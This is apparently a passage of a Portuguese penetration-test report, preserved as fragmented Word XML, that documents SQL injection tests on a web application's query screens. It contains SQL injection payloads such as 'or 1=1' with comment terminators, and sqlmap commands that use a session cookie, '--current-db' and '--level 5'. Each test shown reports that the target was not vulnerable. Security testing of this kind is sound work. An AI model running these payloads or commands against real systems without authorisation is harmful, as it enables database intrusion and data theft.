        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ável conforme mostra a figura 18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D0530" w:rsidRPr="00F15F82" w:rsidRDefault="008D0530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7411F3" wp14:editId="3EE183A0">
            <wp:extent cx="5400040" cy="4112260"/>
            <wp:effectExtent l="0" t="0" r="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18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exploração </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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Injection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Sqlmap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6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Alterar o comando utilizado </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nas </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s anteriores para incluir o parâmetro “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cadastro”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entar injeção de SQL no parâmetro “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cadastro</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Comando</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F8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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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-p cadastr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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"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F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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cadastro” é o atributo que sofrerá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inje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5CE" w:rsidRPr="00F15F82" w:rsidRDefault="00D975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975CE" w:rsidRPr="00F15F82" w:rsidRDefault="00D975CE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faça o tratamento do parâmetro “cadastro”.</w:t>
      </w:r>
      <w:r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lastRenderedPageBreak/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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>O parâmetro</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/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975CE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D975CE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">cadastro” </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ável conforme mostra a figura 19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5A529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835DA0" wp14:editId="06ABAE6D">
            <wp:extent cx="5400040" cy="412686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19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exploração </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82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Injection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Sqlmap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7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Alterar o comando utilizado </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">nas </w:t>
      </w:r>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sessão</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0048383A" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s anteriores para incluir o parâmetro “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ok</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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entar injeção de SQL no parâmetro “</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ok</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Comando: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -r </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs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i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p ok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O comando “-r” indica ao programa que as instruções do ataque devem ser carregadas no arquivo </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>params</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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p” indica o parâmetro que deve ser injetado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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ok” é o atributo que sofrerá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inje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aplicação faça o tratamento do parâmetro</w:t>
      </w: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“ok”.</w:t>
      </w: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lastRenderedPageBreak/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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">O parâmetro </w:t>
      </w:r>
      <w:r w:rsidR="00101063" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">“ok” </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>escolhido para teste de injeção SQL não é injet</w:t>
      </w:r>
      <w:r w:rsidR="003F64B7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ável conforme mostra a figura 20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236F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4F4346" wp14:editId="12D48656">
            <wp:extent cx="5400040" cy="405828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20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exploração </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008C6DC7"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Injection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Sqlmap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3.5 Tela</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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Consulta Servidor - SQL </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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arefa realizada dia 18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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: 1 hora e 40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Submeter entradas maliciosas no sistema através de injeção de códigos SQL na página de Consulta Servidor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n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e forçar ações não autorizadas no sistem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sultado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1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Verificar se o campo “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> é vulnerável à injeção de código SQL fazendo uso da técnica de concatenação de aspas simple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Espera-s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5F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>que o sistema realiz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ntrada: 1000’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“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Inserir um texto com uma distribuição adequada de aspa simples e comentários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como entrada no campo “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82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”, a fim de modificar a instrução SQL utilizada pelo sistema na consulta de dados referentes a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iap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e usuários cadastrados. Comentários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nline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foram utilizados n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e forçar o interpretador de SQL da aplicação a ignorar todas as instruções SQL que vierem após o comentário inserido.</w:t>
      </w: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101063" w:rsidRPr="00F15F82" w:rsidRDefault="00101063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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Esper-se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que o sistema realize o tratamento para impedir que os comentários sejam interpretados como parte da consul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ntradas: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1000 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>or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1=1 #</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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End"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1000 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>or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1=1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F8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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">--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A aplicação realizou o tratamento de dados de entrada, não permitindo a mudança de comportamento da instrução SQL utilizada pelo sistema para consultar os dados dos usuários cadastrad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8C6DC7" w:rsidP="00630433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Tela Consulta Servidor – Exploração via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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qlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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Tarefa realizada nos dias 19, 20 e 22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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>: 3 horas e 30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Utilizar a ferramenta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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para automatizar o processo de detecção de vulnerabilidades na tela de Consulta Servidor a partir de injeção de códigos SQL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sultado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1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lastRenderedPageBreak/>
        <w:t>Verificar se a tela Consulta Servidor é vulnerável a injeção de código SQL e caso haja vulnerabilidade conseguir obter o nome do banco de dados utilizado pelo sistem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Para realizar essa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foi necessário utilizar a ferramenta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Burp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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Suite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para capturar as informações de cookie contidas no cabeçalho HTTP de uma requisição no momento em que </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a página de Consulta Servidor</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> é acessad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F15F82" w:rsidRDefault="000D038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3243AB" wp14:editId="695AF154">
            <wp:extent cx="4486275" cy="1238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3(Editada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21</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Parâmetros obtidos através do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Burp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Suite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ntrada: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./sqlmap.py -u "http://IP_do_servidor/</w:t>
      </w:r>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nomeSistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">/index.php?pg=servidores"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--cookie=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PHSESSID=75ce718b37088517cafla733d53c60f" --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>current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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>db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63043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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>./sqlmap.py” comando utilizado para executar a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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u” especifica a URL alvo da página a ser explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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“--cookie” especifica um cookie de sessão válido a ser passado para o </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>current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15F82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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” comando utilizado para obter o nome do banco de dados utilizado pelo sistema alvo.</w:t>
      </w:r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65D65" w:rsidRPr="00F15F82" w:rsidRDefault="00D65D6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D65D6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-se que </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a tela de Consulta servidor</w:t>
      </w:r>
      <w:proofErr w:type="gram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seja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possível descobrir o nome do banco de dados utilizado pela aplica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>. Não possível encontrar vulnerabilidade na página e consequentemente não foi possível descobrir o nome do banco de dados utilizado no sistema.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As figuras 2</w:t>
      </w:r>
      <w:r w:rsidR="00605CFE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2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605CFE" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>e 23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mostram os resultados d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022ED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1C4F4D" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w: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E9073E" wp14:editId="66C7CCA8">
            <wp:extent cx="5400040" cy="40544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22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exploração SQL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Injection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Sqlmap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– Parte 1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04EFF" w:rsidRPr="00F15F82" w:rsidRDefault="00F04EF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A0341E5" wp14:editId="0A03A125">
            <wp:extent cx="5428615" cy="4064635"/>
            <wp:effectExtent l="0" t="0" r="63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5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lastRenderedPageBreak/>
        <w:t>Figura 23</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resultado exploração SQL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Injection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Sqlmap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– Parte 2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160" w:line="252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Repetir a ação da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5F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> e aumentar o nível de heurística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aplicada pel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injeção de SQL para o valor máximo: 5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ntrada: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./sqlmap.py -u "http://IP_do_servidor/</w:t>
      </w:r>
      <w:r w:rsidR="002D4365">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nomeSistema</w:t>
      </w:r>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">/index.php?pg=servidores"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--cookie="PHSESSID=75ce718b37088517cafla733d53c60f" --current -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  --</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>level 5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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>./sqlmap.py” comando utilizado para executar a aplicação.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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u” especifica a URL alvo da página a ser explorada.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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-cookie” especifica um cookie de sessão válido a ser passado para o SQL MAP durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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“--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>current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15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>db</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” comando utilizado para obter o nome do banco de dados utilizado pelo sistema alvo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="00630433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 “--</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>level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5F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>” comando utilizado para aumentar o nível da heurística utilizada no escaneament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473CA" w:rsidRPr="00F15F82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473CA" w:rsidRPr="00F15F82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473CA" w:rsidRPr="00F15F82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6473C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-se que a tela Consulta Servidor n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vulnerável à injeção de SQL e consequentemente nã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sej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ossível descobrir o nome do banco de dados utilizado pela aplicaçã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>. Mesmo aumentando o nível da heurística utilizada no escaneamento, não possível encontrar vulnerabilidade na página e consequentemente não foi possível descobrir o nome do banco de dados utilizado no sistema.</w:t>
      </w:r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8C6DC7" w:rsidRPr="00F15F82" w:rsidRDefault="008C6DC7" w:rsidP="0063043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F15F82">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
